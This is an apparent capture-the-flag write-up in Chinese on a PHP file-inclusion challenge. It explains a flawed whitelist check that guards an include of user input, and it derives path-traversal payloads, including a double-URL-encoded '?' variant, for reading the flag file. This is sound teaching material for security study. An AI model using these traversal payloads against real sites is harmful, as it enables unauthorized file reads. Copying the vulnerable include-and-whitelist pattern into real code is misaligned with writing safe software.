按F12发现提示:
http://f25ece33-0891-47a1-b89a-eefac33b2f4f.node4.buuoj.cn/source.php
得到代码:
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "
";
}
2.3.1.1:$_REQUEST
变量 $_REQUEST用于收集HTML表单提交的数据,默认情况下包含了$_GET,$_POST和$_COOKIE的数组。
GET是从服务器上获取数据,GET是把参数数据队列加到提交表单的ACTION属性所指的URL中,值和表单内各个字段一一对应,在URL中可以看到。
POST是向服务器传送数据,POST是通过HTTP POST机制,将表单内各个字段与其内容放置在HTML HEADER内一起传送到ACTION属性所指的URL地址,用户看不到这个过程。
通过POST和GET方法提交的所有数据都可以通过$_REQUEST["参数"]获得。
2.3.1.2:empty()
empty(var) 函数用于检查一个变量是否为空,当 变量var 存在,并且是一个非空非零的值时返回 FALSE 否则返回 TRUE。
2.3.1.3:is_string()
is_string(var)检测变量是否是字符串,如果var是字符串则返回true,否则返回false。
2.3.1.4:include
include语句包含并运行指定文件。
文件查找过程:
1、被包含文件先按参数给出的路径寻找。
2、如果没有给出目录(只有文件名)时则按照include_path指定的目录寻找。
3、如果在include_path下没找到该文件,则include最后才在调用脚本文件所在的目录和当前工作目录下寻找。
4、如果最后仍未找到文件则include会发出一条警告。
2.3.1.5:逻辑结构
传入的file参数需满足以下3个条件,才可包含并运行file:
(1)不为空
(2)为字符串
(3)emmm::checkFile($_REQUEST['file']) 返回 true
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
2.3.2.1:第一部分
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
设置了白名单数组:source.php,hint.php;尝试将这两个文件赋给参数file:
http://655324d1-2d9d-4368-b055-00747977dfd1.node4.buuoj.cn/?file=source.php
http://655324d1-2d9d-4368-b055-00747977dfd1.node4.buuoj.cn/?file=hint.php
这句话说明flag可能在文件ffffllllaaaagggg中,我们要include ffffllllaaaagggg。
2.3.2.2:第二部分
if (in_array($page, $whitelist)) {
return true;
}
若$page的值在数组$whitelist中,则返回true。
2.3.2.3:第三部分
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
2.3.2.3.1:mb_substr()
mb_substr ( string $str , int $start , int $length )
mb_substr() 函数从$str的$start字符位置开始,截断$length个字符并返回字符串。$str的第一个字符的位置是 0,第二个字符的位置是 1,以此类推。
类似substr() 函数,substr() 函数只针对英文字符,如果要分割的中文文字则需要使用 mb_substr()。
2.3.2.3.2:mb_strpos()
mb_strpos(haystack, needle),查找字符串needle在另一个字符串haystack中首次出现的位置,返回位置(int)。第一个字符的位置是 0,第二个字符的位置是 1,以此类推。
2.3.2.3.3:逻辑解释
将$page字符串第一个问号?以前的字符串截下来,保存在$_page中,若$_page值为source.php、hint.php则返回true。
2.3.2.3:第四部分
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
若要执行第三部分语句,说明第一、二、三部分的if语句条件均为false。第四部分if语句中的$_page经历了如下改变:一次问号截断,一次url解码,一次问号截断。
注:url传入服务器会自动进行一次urldecode。
?的url编码为%3F,双重url编码为%253F。
#第三部分
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
#第四部分
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
2.3.2.4:如何返回true
以下三种构造方式均可让emmm::checkFile($_REQUEST['file'])返回true:
(1)满足第二部分if语句:file=source.php
(2)满足第三部分if语句:file=source.php?xxxxxxxxx
(3)满足第四部分if语句:file=source.php%253Fxxxxxxx
注:source.php可换成hint.php。
file=source.php?/../../../../ffffllllaaaagggg
file=source.php%253F/../../../../ffffllllaaaagggg
(1)要满足emmm::checkFile($_REQUEST['file'])返回true
(2)要include找到文件ffffllllaaaagggg
(3)../代表返回上级目录
疑惑:source.php?/ 不是文件目录为何能找到ffffllllaaaagggg?
解释:include会将source.php?/看做是一个目录,即使它不存在,只要通过几个 ../ 返回上级目录即可。比如 file=source.php?/aaa/bbb/ccc/../../../../../../../ffffllllaaaagggg 依然可行。